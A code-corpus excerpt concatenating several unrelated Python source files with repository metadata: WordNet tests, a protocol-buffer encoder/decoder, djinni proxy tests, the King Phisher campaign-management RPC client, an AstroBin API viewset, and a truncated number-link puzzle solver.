ancestor_hyperonyms = hoob_synset.closure('has_hyperonym',depth=1)
self.assertEqual(len(ancestor_hyperonyms),len(real_ancestor_hyperonyms))
self.assertTrue(all(ancestor.id in real_ancestor_ids for ancestor in ancestor_hyperonyms))
def test_shortest_path_distance_to_itself(self):
source_synset = wn.synset('hulkuma.v.01')
target_synset = wn.synset('hulkuma.v.01')
self.assertEqual(source_synset._shortest_path_distance(target_synset),0)
def test_shortest_path_distance_to_parent(self):
source_synset = wn.synset('hiphop.n.01')
target_synset = wn.synset('tantsustiil.n.01')
self.assertEqual(source_synset._shortest_path_distance(target_synset),1)
def test_shortest_path_distance_to_sibling(self):
source_synset = wn.synset('hobu.n.01')
target_synset = wn.synset('eesel.n.01')
self.assertEqual(source_synset._shortest_path_distance(target_synset),2)
def test_path_similarity_with_itself(self):
source_synset = wn.synset('ilming.n.02')
target_synset = wn.synset('fenomen.n.01')
self.assertEqual(source_synset.path_similarity(target_synset),1)
def test_path_similarity_with_unconnected(self):
pass # would take too much time
def test_path_similarity_with_sibling(self):
source_synset = wn.synset('kaarhall.n.01')
target_synset = wn.synset('näitusehall.n.01')
self.assertEqual(source_synset.path_similarity(target_synset), 1.0/3)
def test_root_min_depth(self):
synset = wn.synset('olev.n.02')
self.assertEqual(synset._min_depth(),0)
def test_arbitrary_min_depth(self):
synset = wn.synset('vahend.n.02')
self.assertEqual(synset._min_depth(),3)
| estnltk/estnltk | estnltk/tests/test_wordnet.py | Python | gpl-2.0 | 6,503 |
#!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import struct
import array
import string
import re
from google.pyglib.gexcept import AbstractMethod
import httplib
__all__ = ['ProtocolMessage', 'Encoder', 'Decoder',
'ProtocolBufferDecodeError',
'ProtocolBufferEncodeError',
'ProtocolBufferReturnError']
URL_RE = re.compile('^(https?)://([^/]+)(/.*)$')
class ProtocolMessage:
def __init__(self, contents=None):
raise AbstractMethod
def Clear(self):
raise AbstractMethod
def IsInitialized(self, debug_strs=None):
raise AbstractMethod
def Encode(self):
try:
return self._CEncode()
except AbstractMethod:
e = Encoder()
self.Output(e)
return e.buffer().tostring()
def SerializeToString(self):
return self.Encode()
def SerializePartialToString(self):
try:
return self._CEncodePartial()
except (AbstractMethod, AttributeError):
e = Encoder()
self.OutputPartial(e)
return e.buffer().tostring()
def _CEncode(self):
raise AbstractMethod
def _CEncodePartial(self):
raise AbstractMethod
def ParseFromString(self, s):
self.Clear()
self.MergeFromString(s)
def ParsePartialFromString(self, s):
self.Clear()
self.MergePartialFromString(s)
def MergeFromString(self, s):
self.MergePartialFromString(s)
dbg = []
if not self.IsInitialized(dbg):
raise ProtocolBufferDecodeError, '\n\t'.join(dbg)
def MergePartialFromString(self, s):
try:
self._CMergeFromString(s)
except AbstractMethod:
a = array.array('B')
a.fromstring(s)
d = Decoder(a, 0, len(a))
self.TryMerge(d)
def _CMergeFromString(self, s):
raise AbstractMethod
def __getstate__(self):
return self.Encode()
def __setstate__(self, contents_):
self.__init__(contents=contents_)
def sendCommand(self, server, url, response, follow_redirects=1,
secure=0, keyfile=None, certfile=None):
data = self.Encode()
if secure:
if keyfile and certfile:
conn = httplib.HTTPSConnection(server, key_file=keyfile,
cert_file=certfile)
else:
conn = httplib.HTTPSConnection(server)
else:
conn = httplib.HTTPConnection(server)
conn.putrequest("POST", url)
conn.putheader("Content-Length", "%d" %len(data))
conn.endheaders()
conn.send(data)
resp = conn.getresponse()
if follow_redirects > 0 and resp.status == 302:
m = URL_RE.match(resp.getheader('Location'))
if m:
protocol, server, url = m.groups()
return self.sendCommand(server, url, response,
follow_redirects=follow_redirects - 1,
secure=(protocol == 'https'),
keyfile=keyfile,
certfile=certfile)
if resp.status != 200:
raise ProtocolBufferReturnError(resp.status)
if response is not None:
response.ParseFromString(resp.read())
return response
def sendSecureCommand(self, server, keyfile, certfile, url, response,
follow_redirects=1):
return self.sendCommand(server, url, response,
follow_redirects=follow_redirects,
secure=1, keyfile=keyfile, certfile=certfile)
def __str__(self, prefix="", printElemNumber=0):
raise AbstractMethod
def ToASCII(self):
return self._CToASCII(ProtocolMessage._SYMBOLIC_FULL_ASCII)
def ToCompactASCII(self):
return self._CToASCII(ProtocolMessage._NUMERIC_ASCII)
def ToShortASCII(self):
return self._CToASCII(ProtocolMessage._SYMBOLIC_SHORT_ASCII)
_NUMERIC_ASCII = 0
_SYMBOLIC_SHORT_ASCII = 1
_SYMBOLIC_FULL_ASCII = 2
def _CToASCII(self, output_format):
raise AbstractMethod
def ParseASCII(self, ascii_string):
raise AbstractMethod
def ParseASCIIIgnoreUnknown(self, ascii_string):
raise AbstractMethod
def Equals(self, other):
raise AbstractMethod
def __eq__(self, other):
if other.__class__ is self.__class__:
return self.Equals(other)
return NotImplemented
def __ne__(self, other):
if other.__class__ is self.__class__:
return not self.Equals(other)
return NotImplemented
def Output(self, e):
dbg = []
if not self.IsInitialized(dbg):
raise ProtocolBufferEncodeError, '\n\t'.join(dbg)
self.OutputUnchecked(e)
return
def OutputUnchecked(self, e):
raise AbstractMethod
def OutputPartial(self, e):
raise AbstractMethod
def Parse(self, d):
self.Clear()
self.Merge(d)
return
def Merge(self, d):
self.TryMerge(d)
dbg = []
if not self.IsInitialized(dbg):
raise ProtocolBufferDecodeError, '\n\t'.join(dbg)
return
def TryMerge(self, d):
raise AbstractMethod
def CopyFrom(self, pb):
if (pb == self): return
self.Clear()
self.MergeFrom(pb)
def MergeFrom(self, pb):
raise AbstractMethod
def lengthVarInt32(self, n):
return self.lengthVarInt64(n)
def lengthVarInt64(self, n):
if n < 0:
return 10
result = 0
while 1:
result += 1
n >>= 7
if n == 0:
break
return result
def lengthString(self, n):
return self.lengthVarInt32(n) + n
def DebugFormat(self, value):
return "%s" % value
def DebugFormatInt32(self, value):
if (value <= -2000000000 or value >= 2000000000):
return self.DebugFormatFixed32(value)
return "%d" % value
def DebugFormatInt64(self, value):
if (value <= -20000000000000 or value >= 20000000000000):
return self.DebugFormatFixed64(value)
return "%d" % value
def DebugFormatString(self, value):
def escape(c):
o = ord(c)
if o == 10: return r"\n"
if o == 39: return r"\'"
if o == 34: return r'\"'
if o == 92: return r"\\"
if o >= 127 or o < 32: return "\\%03o" % o
return c
return '"' + "".join([escape(c) for c in value]) + '"'
def DebugFormatFloat(self, value):
return "%ff" % value
def DebugFormatFixed32(self, value):
if (value < 0): value += (1L<<32)
return "0x%x" % value
def DebugFormatFixed64(self, value):
if (value < 0): value += (1L<<64)
return "0x%x" % value
def DebugFormatBool(self, value):
if value:
return "true"
else:
return "false"
class Encoder:
NUMERIC = 0
DOUBLE = 1
STRING = 2
STARTGROUP = 3
ENDGROUP = 4
FLOAT = 5
MAX_TYPE = 6
def __init__(self):
self.buf = array.array('B')
return
def buffer(self):
return self.buf
def put8(self, v):
if v < 0 or v >= (1<<8): raise ProtocolBufferEncodeError, "u8 too big"
self.buf.append(v & 255)
return
def put16(self, v):
if v < 0 or v >= (1<<16): raise ProtocolBufferEncodeError, "u16 too big"
self.buf.append((v >> 0) & 255)
self.buf.append((v >> 8) & 255)
return
def put32(self, v):
if v < 0 or v >= (1L<<32): raise ProtocolBufferEncodeError, "u32 too big"
self.buf.append((v >> 0) & 255)
self.buf.append((v >> 8) & 255)
self.buf.append((v >> 16) & 255)
self.buf.append((v >> 24) & 255)
return
def put64(self, v):
if v < 0 or v >= (1L<<64): raise ProtocolBufferEncodeError, "u64 too big"
self.buf.append((v >> 0) & 255)
self.buf.append((v >> 8) & 255)
self.buf.append((v >> 16) & 255)
self.buf.append((v >> 24) & 255)
self.buf.append((v >> 32) & 255)
self.buf.append((v >> 40) & 255)
self.buf.append((v >> 48) & 255)
self.buf.append((v >> 56) & 255)
return
def putVarInt32(self, v):
buf_append = self.buf.append
if v & 127 == v:
buf_append(v)
return
if v >= 0x80000000 or v < -0x80000000:
raise ProtocolBufferEncodeError, "int32 too big"
if v < 0:
v += 0x10000000000000000
while True:
bits = v & 127
v >>= 7
if v:
bits |= 128
buf_append(bits)
if not v:
break
return
def putVarInt64(self, v):
buf_append = self.buf.append
if v >= 0x8000000000000000 or v < -0x8000000000000000:
raise ProtocolBufferEncodeError, "int64 too big"
if v < 0:
v += 0x10000000000000000
while True:
bits = v & 127
v >>= 7
if v:
bits |= 128
buf_append(bits)
if not v:
break
return
def putVarUint64(self, v):
buf_append = self.buf.append
if v < 0 or v >= 0x10000000000000000:
raise ProtocolBufferEncodeError, "uint64 too big"
while True:
bits = v & 127
v >>= 7
if v:
bits |= 128
buf_append(bits)
if not v:
break
return
def putFloat(self, v):
a = array.array('B')
a.fromstring(struct.pack("<f", v))
self.buf.extend(a)
return
def putDouble(self, v):
a = array.array('B')
a.fromstring(struct.pack("<d", v))
self.buf.extend(a)
return
def putBoolean(self, v):
if v:
self.buf.append(1)
else:
self.buf.append(0)
return
def putPrefixedString(self, v):
v = str(v)
self.putVarInt32(len(v))
self.buf.fromstring(v)
return
def putRawString(self, v):
self.buf.fromstring(v)
class Decoder:
def __init__(self, buf, idx, limit):
self.buf = buf
self.idx = idx
self.limit = limit
return
def avail(self):
return self.limit - self.idx
def buffer(self):
return self.buf
def pos(self):
return self.idx
def skip(self, n):
if self.idx + n > self.limit: raise ProtocolBufferDecodeError, "truncated"
self.idx += n
return
def skipData(self, tag):
t = tag & 7
if t == Encoder.NUMERIC:
self.getVarInt64()
elif t == Encoder.DOUBLE:
self.skip(8)
elif t == Encoder.STRING:
n = self.getVarInt32()
self.skip(n)
elif t == Encoder.STARTGROUP:
while 1:
t = self.getVarInt32()
if (t & 7) == Encoder.ENDGROUP:
break
else:
self.skipData(t)
if (t - Encoder.ENDGROUP) != (tag - Encoder.STARTGROUP):
raise ProtocolBufferDecodeError, "corrupted"
elif t == Encoder.ENDGROUP:
raise ProtocolBufferDecodeError, "corrupted"
elif t == Encoder.FLOAT:
self.skip(4)
else:
raise ProtocolBufferDecodeError, "corrupted"
def get8(self):
if self.idx >= self.limit: raise ProtocolBufferDecodeError, "truncated"
c = self.buf[self.idx]
self.idx += 1
return c
def get16(self):
if self.idx + 2 > self.limit: raise ProtocolBufferDecodeError, "truncated"
c = self.buf[self.idx]
d = self.buf[self.idx + 1]
self.idx += 2
return (d << 8) | c
def get32(self):
if self.idx + 4 > self.limit: raise ProtocolBufferDecodeError, "truncated"
c = self.buf[self.idx]
d = self.buf[self.idx + 1]
e = self.buf[self.idx + 2]
f = long(self.buf[self.idx + 3])
self.idx += 4
return (f << 24) | (e << 16) | (d << 8) | c
def get64(self):
if self.idx + 8 > self.limit: raise ProtocolBufferDecodeError, "truncated"
c = self.buf[self.idx]
d = self.buf[self.idx + 1]
e = self.buf[self.idx + 2]
f = long(self.buf[self.idx + 3])
g = long(self.buf[self.idx + 4])
h = long(self.buf[self.idx + 5])
i = long(self.buf[self.idx + 6])
j = long(self.buf[self.idx + 7])
self.idx += 8
return ((j << 56) | (i << 48) | (h << 40) | (g << 32) | (f << 24)
| (e << 16) | (d << 8) | c)
def getVarInt32(self):
b = self.get8()
if not (b & 128):
return b
result = long(0)
shift = 0
while 1:
result |= (long(b & 127) << shift)
shift += 7
if not (b & 128):
if result >= 0x10000000000000000L:
raise ProtocolBufferDecodeError, "corrupted"
break
if shift >= 64: raise ProtocolBufferDecodeError, "corrupted"
b = self.get8()
if result >= 0x8000000000000000L:
result -= 0x10000000000000000L
if result >= 0x80000000L or result < -0x80000000L:
raise ProtocolBufferDecodeError, "corrupted"
return result
def getVarInt64(self):
result = self.getVarUint64()
if result >= (1L << 63):
result -= (1L << 64)
return result
def getVarUint64(self):
result = long(0)
shift = 0
while 1:
if shift >= 64: raise ProtocolBufferDecodeError, "corrupted"
b = self.get8()
result |= (long(b & 127) << shift)
shift += 7
if not (b & 128):
if result >= (1L << 64): raise ProtocolBufferDecodeError, "corrupted"
return result
return result
def getFloat(self):
if self.idx + 4 > self.limit: raise ProtocolBufferDecodeError, "truncated"
a = self.buf[self.idx:self.idx+4]
self.idx += 4
return struct.unpack("<f", a)[0]
def getDouble(self):
if self.idx + 8 > self.limit: raise ProtocolBufferDecodeError, "truncated"
a = self.buf[self.idx:self.idx+8]
self.idx += 8
return struct.unpack("<d", a)[0]
def getBoolean(self):
b = self.get8()
if b != 0 and b != 1: raise ProtocolBufferDecodeError, "corrupted"
return b
def getPrefixedString(self):
length = self.getVarInt32()
if self.idx + length > self.limit:
raise ProtocolBufferDecodeError, "truncated"
r = self.buf[self.idx : self.idx + length]
self.idx += length
return r.tostring()
def getRawString(self):
r = self.buf[self.idx:self.limit]
self.idx = self.limit
return r.tostring()
class ProtocolBufferDecodeError(Exception): pass
class ProtocolBufferEncodeError(Exception): pass
class ProtocolBufferReturnError(Exception): pass
| SRabbelier/Melange | thirdparty/google_appengine/google/net/proto/ProtocolBuffer.py | Python | apache-2.0 | 14,205 |
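# Editor's note: a small round-trip sketch for the Encoder/Decoder classes in
# ProtocolBuffer.py above (Python 2, like the module itself; the import path
# assumes the App Engine SDK layout shown in the record above).
from google.net.proto.ProtocolBuffer import Encoder, Decoder
e = Encoder()
e.putVarInt32(300)           # varints use 7 payload bits per byte, LSB first: 0xAC 0x02
e.putPrefixedString('hi')    # length varint followed by the raw bytes
buf = e.buffer()
d = Decoder(buf, 0, len(buf))
assert d.getVarInt32() == 300
assert d.getPrefixedString() == 'hi'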
# -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function, unicode_literals
from foo_receiver import FooReceiver
from foo_listener_bf import FooListenerBfHelper
from PyCFFIlib_cffi import ffi, lib
import gc
class FooListenerBfImpl:
def delete_fl_in_fl(self):
print ("Not to be used")
def on_string_change(self, prs):
print ("FooListenerImpl.py: on_string_change prs", prs)
self._prs = prs
return self._prs
def get_string(self):
return self._prs
def set_listener_bf(self,fl):
self._fl = fl
def get_listener_bf(self):
return self._fl
def set_binary(self,b):
print ("setting Binary in FooListenerBfImpl ", b)
self._b = b
def get_binary(self):
return self._b
def send_return(self,fl):
return fl
def create():
# TODO: decide if we want to have this here or make checks in the helper.frompy for all
# methods to exist as attributes on the class more lenient
print ("I don't use it but the +p +c plus the check in fromPy for having all methods needs me to have this")
def fr_set_get(fr, fl, s):
fr.add_listener_bf(fl)
assert fr.set_private_bf_string(s) == s, "test_interface_back_forth failed"
# assert fl._prs == s, "test_interface_back_forth failed"
assert fr.get_listener_bf_string() == s, "test_interface_back_forth failed"
# back and forth via regular calls from python to cpp
def test_interface_back_forth():
print ("start test len ", len(FooListenerBfHelper.c_data_set))
fr = FooReceiver.create()
fl = FooListenerBfImpl() # python implementation of listener
fl_cpp = fr.get_foo_listener_bf() # cpp implementation of listener
# both direct and indirect test for python impl of FooListenerBf
fr_set_get(fr, fl, "Hello world!")
# both direct and indirect test for cpp impl of FooListenerBf
fr_set_get(fr, fl_cpp, "Goodbye world!")
fr_set_get(fr, fl_cpp, "Goodbye world!")
# send python implementation back and forth and see that it can still be used, and that no wrapper was added
fl_1 = fr.send_return(fl)
fl_2 = fr.send_return(fl_1)
fr_set_get(fr, fl_2, "Hello")
assert fl == fl_1 and fl_1 == fl_2, "test_interface_back_forth failed"
    # send cpp implementation back and forth and see that it can still be used, and handles hold the same implementation
fl_cpp_1 = fr.send_return(fl_cpp)
fl_cpp_2 = fr.send_return(fl_cpp_1)
fr_set_get(fr, fl_cpp_2, "Goodbye")
assert lib.equal_handles_cw__foo_listener_bf(fl_cpp._cpp_impl, fl_cpp_1._cpp_impl) and \
lib.equal_handles_cw__foo_listener_bf(fl_cpp_1._cpp_impl, fl_cpp_2._cpp_impl)
fl = fl_1 = fl_2 = fl_cpp = fl_cpp_1 = fl_cpp_2 = None
gc.collect()
fr = None
gc.collect()
assert 0 == len(FooListenerBfHelper.c_data_set)
def fr_fl_set_get(fr, fl_in_fl, b):
fr.set_listener_bf_in_listener_bf(fl_in_fl)
fr.set_binary_in_listener_bf_in_listener_bf(b)
assert b == fr.get_binary_in_listener_bf_in_listener_bf(), "test_interface_back_forth failed"
# back and forth via callbacks cpp to python
def test_interface_callback_back_forth():
fr = FooReceiver.create()
fl = FooListenerBfImpl()
fr.add_listener_bf(fl)
fl_in_fl = FooListenerBfImpl()
b = b'Some Binary 11'
fr_fl_set_get(fr, fl_in_fl, b) # listener 1 in python, listener 2 in python
fl_in_fl_1 = fr.in_listener_bf_send_return(fl_in_fl)
fl_in_fl_2 = fr.in_listener_bf_send_return(fl_in_fl_1)
assert fl_in_fl == fl_in_fl_1 and fl_in_fl_1 == fl_in_fl_2, "test_interface_back_forth failed"
fr_fl_set_get(fr, fl_in_fl_2, b) # listener 1 in python, listener 2 in python after back&forth
fl_in_fl = fr.get_foo_listener_bf()
b = b'Some Other Binary 12'
fr_fl_set_get(fr, fl_in_fl, b) # listener 1 in python, listener 2 in cpp
fl_in_fl_1 = fr.in_listener_bf_send_return(fl_in_fl)
fl_in_fl_2 = fr.in_listener_bf_send_return(fl_in_fl_1)
assert lib.equal_handles_cw__foo_listener_bf(fl_in_fl._cpp_impl, fl_in_fl_1._cpp_impl) and \
lib.equal_handles_cw__foo_listener_bf(fl_in_fl_1._cpp_impl, fl_in_fl_2._cpp_impl)
fr_fl_set_get(fr, fl_in_fl_2, b) # listener 1 in python, listener 2 in cpp after back&forth
fl = fr.get_foo_listener_bf()
fr.add_listener_bf(fl)
fl_in_fl = FooListenerBfImpl()
b = b'Some Binary 21'
fr_fl_set_get(fr, fl_in_fl, b) # listener 1 in cpp, listener 2 in python
fl_in_fl_1 = fr.in_listener_bf_send_return(fl_in_fl)
fl_in_fl_2 = fr.in_listener_bf_send_return(fl_in_fl_1)
assert fl_in_fl == fl_in_fl_1 and fl_in_fl_1 == fl_in_fl_2, "test_interface_back_forth failed"
fr_fl_set_get(fr, fl_in_fl_2, b) # listener 1 in cpp, listener 2 in python after back&forth
fl_in_fl = fr.get_foo_listener_bf()
b = b'Some Other Binary 22'
fr_fl_set_get(fr, fl_in_fl, b) # listener 1 in cpp, listener 2 in cpp
fl_in_fl_1 = fr.in_listener_bf_send_return(fl_in_fl)
fl_in_fl_2 = fr.in_listener_bf_send_return(fl_in_fl_1)
assert lib.equal_handles_cw__foo_listener_bf(fl_in_fl._cpp_impl, fl_in_fl_1._cpp_impl) and \
lib.equal_handles_cw__foo_listener_bf(fl_in_fl_1._cpp_impl, fl_in_fl_2._cpp_impl)
fr_fl_set_get(fr, fl_in_fl_2, b) # listener 1 in cpp, listener 2 in cpp after back&forth
fl = fl_in_fl = fl_in_fl_1 = fl_in_fl_2 = None
gc.collect()
fr = None
gc.collect()
assert 0 == len(FooListenerBfHelper.c_data_set)
| trafi/djinni | test-suite/handwritten-src/python/test_proxying.py | Python | apache-2.0 | 5,511 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# king_phisher/client/client_rpc.py
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of the project nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
import code
import collections
import getpass
import json
import logging
import os
import sys
from king_phisher import find
from king_phisher import geoip
from king_phisher.third_party import AdvancedHTTPServer
try:
import msgpack # pylint: disable=unused-import
has_msgpack = True
"""Whether the :py:mod:`msgpack` module is available or not."""
except ImportError:
has_msgpack = False
AlertSubscription = collections.namedtuple('AlertSubscription', ('id', 'user_id', 'campaign_id'))
Campaign = collections.namedtuple('Campaign', ('id', 'name', 'user_id', 'created', 'reject_after_credentials'))
Credential = collections.namedtuple('Credential', ('id', 'visit_id', 'message_id', 'campaign_id', 'username', 'password', 'submitted'))
DeaddropConnection = collections.namedtuple('DeaddropConnection', ('id', 'deployment_id', 'campaign_id', 'visit_count', 'visitor_ip', 'local_username', 'local_hostname', 'local_ip_addresses', 'first_visit', 'last_visit'))
DeaddropDeployment = collections.namedtuple('DeaddropDeployment', ('id', 'campaign_id', 'destination'))
LandingPage = collections.namedtuple('LandingPage', ('id', 'campaign_id', 'hostname', 'page'))
Message = collections.namedtuple('Message', ('id', 'campaign_id', 'target_email', 'company_name', 'first_name', 'last_name', 'opened', 'sent', 'trained'))
MetaData = collections.namedtuple('MetaData', ('id', 'value_type', 'value'))
User = collections.namedtuple('User', ('id', 'phone_carrier', 'phone_number'))
Visit = collections.namedtuple('Visit', ('id', 'message_id', 'campaign_id', 'visit_count', 'visitor_ip', 'visitor_details', 'first_visit', 'last_visit'))
_table_row_classes = {
'alert_subscriptions': AlertSubscription,
'campaigns': Campaign,
'credentials': Credential,
'deaddrop_connections': DeaddropConnection,
'deaddrop_deployments': DeaddropDeployment,
'landing_pages': LandingPage,
'messages': Message,
'meta_data': MetaData,
'users': User,
'visits': Visit
}
class KingPhisherRPCClient(AdvancedHTTPServer.AdvancedHTTPServerRPCClientCached):
"""
The main RPC object for communicating with the King Phisher Server
over RPC.
"""
def __init__(self, *args, **kwargs):
self.logger = logging.getLogger('KingPhisher.Client.RPC')
super(KingPhisherRPCClient, self).__init__(*args, **kwargs)
if has_msgpack:
serializer = 'binary/message-pack'
else:
serializer = 'binary/json'
self.set_serializer(serializer)
def __repr__(self):
return "<{0} '{1}@{2}:{3}{4}'>".format(self.__class__.__name__, self.username, self.host, self.port, self.uri_base)
def remote_table(self, table, *args):
"""
Iterate over a remote database table hosted on the server. Rows are
yielded as named tuples whose fields are the columns of the specified
table.
:param str table: The table name to retrieve.
:return: A generator which yields rows of named tuples.
:rtype: tuple
"""
table_method = table + '/view'
table = table.rsplit('/', 1)[-1]
page = 0
args = list(args)
args.append(page)
results = self.call(table_method, *args)
results_length = len(results or '')
row_cls = _table_row_classes[table]
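        # Page through the results: keep requesting the next page until a call
        # returns fewer entries than the first call did (or returns nothing).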
while results:
for row in results['rows']:
yield row_cls(*row)
if len(results) < results_length:
break
args[-1] += 1
results = self.call(table_method, *args)
def remote_table_row(self, table, row_id, cache=False, refresh=False):
"""
        Get a row from the specified table by its id, optionally caching it.
:param str table: The table in which the row exists.
:param row_id: The value of the row's id column.
:param bool cache: Whether to use the cache for this row.
:param bool refresh: If *cache* is True, get the current row value and store it.
:return: The remote row as a named tuple of the specified table.
:rtype: tuple
"""
table_method = table + '/get'
if cache and refresh:
row = self.cache_call_refresh(table_method, row_id)
elif cache and not refresh:
row = self.cache_call(table_method, row_id)
else:
row = self.call(table_method, row_id)
if row == None:
return None
row_cls = _table_row_classes[table]
return row_cls(**row)
def geoip_lookup(self, ip):
"""
Look up the geographic location information for the specified IP
address in the server's geoip database.
:param ip: The IP address to lookup.
:type ip: :py:class:`ipaddress.IPv4Address`, str
:return: The geographic location information for the specified IP address.
:rtype: :py:class:`~king_phisher.geoip.GeoLocation`
"""
result = self.cache_call('geoip/lookup', str(ip))
if result:
result = geoip.GeoLocation(ip, result=result)
return result
def geoip_lookup_multi(self, ips):
"""
Look up the geographic location information for the specified IP
addresses in the server's geoip database. Because results are cached
for optimal performance, IP addresses to be queried should be grouped
and sorted in a way that is unlikely to change, i.e. by a timestamp.
:param ips: The IP addresses to lookup.
:type ips: list, set, tuple
        :return: The geographic location information for the specified IP addresses.
:rtype: dict
"""
ips = [str(ip) for ip in ips]
results = self.cache_call('geoip/lookup/multi', ips)
for ip, data in results.items():
results[ip] = geoip.GeoLocation(ip, result=data)
return results
def vte_child_routine(config):
"""
This is the method which is executed within the child process spawned
by VTE. It expects additional values to be set in the *config*
object so it can initialize a new :py:class:`.KingPhisherRPCClient`
instance. It will then drop into an interpreter where the user may directly
interact with the rpc object.
:param str config: A JSON encoded client configuration.
"""
config = json.loads(config)
try:
import readline
import rlcompleter # pylint: disable=unused-variable
except ImportError:
pass
else:
readline.parse_and_bind('tab: complete')
plugins_directory = find.find_data_directory('rpc_plugins')
if plugins_directory:
sys.path.append(plugins_directory)
rpc = KingPhisherRPCClient(**config['rpc_data'])
logged_in = False
for _ in range(0, 3):
rpc.password = getpass.getpass("{0}@{1}'s password: ".format(rpc.username, rpc.host))
try:
logged_in = rpc('ping')
except AdvancedHTTPServer.AdvancedHTTPServerRPCError:
print('Permission denied, please try again.') # pylint: disable=C0325
continue
else:
break
if not logged_in:
return
banner = "Python {0} on {1}".format(sys.version, sys.platform)
print(banner) # pylint: disable=C0325
information = "Campaign Name: '{0}' ID: {1}".format(config['campaign_name'], config['campaign_id'])
print(information) # pylint: disable=C0325
console_vars = {
'CAMPAIGN_NAME': config['campaign_name'],
'CAMPAIGN_ID': config['campaign_id'],
'os': os,
'rpc': rpc,
'sys': sys
}
export_to_builtins = ['CAMPAIGN_NAME', 'CAMPAIGN_ID', 'rpc']
console = code.InteractiveConsole(console_vars)
for var in export_to_builtins:
console.push("__builtins__['{0}'] = {0}".format(var))
console.interact('The \'rpc\' object holds the connected KingPhisherRPCClient instance')
return
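# Usage sketch (illustrative only; the constructor arguments shown here are
# assumptions -- see AdvancedHTTPServerRPCClientCached for the real signature):
#   rpc = KingPhisherRPCClient(('server.example.com', 80), username='alice', password='...')
#   for campaign in rpc.remote_table('campaigns'):
#       print(campaign.name)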
| drptbl/king-phisher | king_phisher/client/client_rpc.py | Python | bsd-3-clause | 8,698 |
from django.shortcuts import get_object_or_404
from rest_framework.decorators import action
from rest_framework.parsers import MultiPartParser, FormParser
from astrobin_apps_equipment.api.filters.accessory_edit_proposal_filter import AccessoryEditProposalFilter
from astrobin_apps_equipment.api.serializers.accessory_edit_proposal_image_serializer import \
AccessoryEditProposalImageSerializer
from astrobin_apps_equipment.api.serializers.accessory_edit_proposal_serializer import AccessoryEditProposalSerializer
from astrobin_apps_equipment.api.views.equipment_item_edit_proposal_view_set import EquipmentItemEditProposalViewSet
from astrobin_apps_equipment.models.accessory_edit_proposal import AccessoryEditProposal
class AccessoryEditProposalViewSet(EquipmentItemEditProposalViewSet):
serializer_class = AccessoryEditProposalSerializer
filter_class = AccessoryEditProposalFilter
@action(
detail=True,
methods=['post'],
serializer_class=AccessoryEditProposalImageSerializer,
parser_classes=[MultiPartParser, FormParser],
)
def image(self, request, pk):
return super(AccessoryEditProposalViewSet, self).image_upload(request, pk)
@action(detail=True, methods=['POST'])
def approve(self, request, pk):
edit_proposal: AccessoryEditProposal = get_object_or_404(AccessoryEditProposal, pk=pk)
check_permissions, response = self.check_edit_proposal_permissions(request, edit_proposal)
if not check_permissions:
return response
return super().approve(request, pk)
class Meta(EquipmentItemEditProposalViewSet.Meta):
abstract = False
| astrobin/astrobin | astrobin_apps_equipment/api/views/accessory_edit_proposal_view_set.py | Python | agpl-3.0 | 1,662 |
# -*- coding: utf-8 ; mode: python -*-
#
# Remove redundant lines
#
# Copyright (C) 2015 Fujitsu
# Copyright (C) 2017 DA Symposium
from nlcheck import NLCheck
import numpy as np
def distance(line_mat, xmat):
"距離を数え上げる"
xd = np.full( xmat.shape, -1, np.integer ) # 距離の行列。初期値-1
# 始点の距離を0とする
for i in range(0, line_mat.shape[0]):
(x0,y0,z0, x1,y1,z1) = line_mat[i]
        xd[y0+1,x0+1] = 0 # coordinates are offset by +1
update = True
while update:
update = False
        for y in range(1, xd.shape[0]-1): # coordinates are offset by +1
            for x in range(1, xd.shape[1]-1): # coordinates are offset by +1
num = xmat[y,x]
for p in ( (y-1,x), (y,x+1), (y,x-1), (y+1,x) ):
                    if num == xmat[p]: # the neighboring cell holds the same number
if xd[p] == -1: continue
dnew = xd[p] + 1
if (xd[y,x] == -1) or (dnew < xd[y,x]):
                            xd[y,x] = dnew # update the distance
update = True
return xd
def distance1(num, line_mat, xmat):
"1本の線について、空き地を通ることを許して、距離を数え上げる"
xd = np.full( xmat.shape, -1, np.integer ) # 距離の行列。初期値-1
# 始点の距離を0とする
(x0,y0,z0, x1,y1,z1) = line_mat[num-1] # 線の番号は1から始まる
xd[y0+1,x0+1] = 0 # 座標が+1ずれる
update = True
while update:
update = False
        for y in range(1, xd.shape[0]-1): # coordinates are offset by +1
            for x in range(1, xd.shape[1]-1): # coordinates are offset by +1
if not (xmat[y,x] in (num, 0)): continue
for p in ( (y-1,x), (y,x+1), (y,x-1), (y+1,x) ):
dnew = xd[p] + 1
if xmat[p] == num or True: #???
if xd[p] == -1: continue
